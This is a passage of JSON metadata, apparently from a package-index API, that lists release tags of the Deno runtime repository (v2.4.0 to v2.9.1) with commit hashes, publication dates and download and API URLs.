:"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/